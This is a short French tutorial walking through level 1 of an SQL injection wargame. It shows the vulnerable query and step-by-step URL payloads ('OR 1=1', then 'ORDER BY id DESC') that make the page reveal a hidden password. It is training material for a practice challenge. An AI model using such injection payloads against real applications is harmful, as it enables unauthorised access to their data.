SQL Injection Wargame Tutorial :: Level 1

Détails du niveau

But : Exploiter le script présent ici afin de lui faire afficher la dernière news, celle-ci contenant le mot de passe du niveau.

Requête : SELECT news FROM table WHERE id=$id;

Variable : 'id' dans le script index.php.

Exploitation

• http://www.hackingzone.org/sql/level1/index.php?id=2

        Affichage de la news numéro 2 : tout est normal
  

• http://www.hackingzone.org/sql/level1/index.php?id=2 OR 1=1

        Affichage de la news numéro 1.
  
        Cela signifie que :
  
  
  • il n'y a pas de contrôle sur le nombre de résultats de la requête, on affiche simplement le 1er enregistrement
  • il nous suffit donc de faire afficher toutes les news, en commençant par la dernière

• http://www.hackingzone.org/sql/level1/index.php?id=2 OR 1=1 ORDER BY id DESC

        Bingo, la dernière news, et le mot de passe, s'affichent !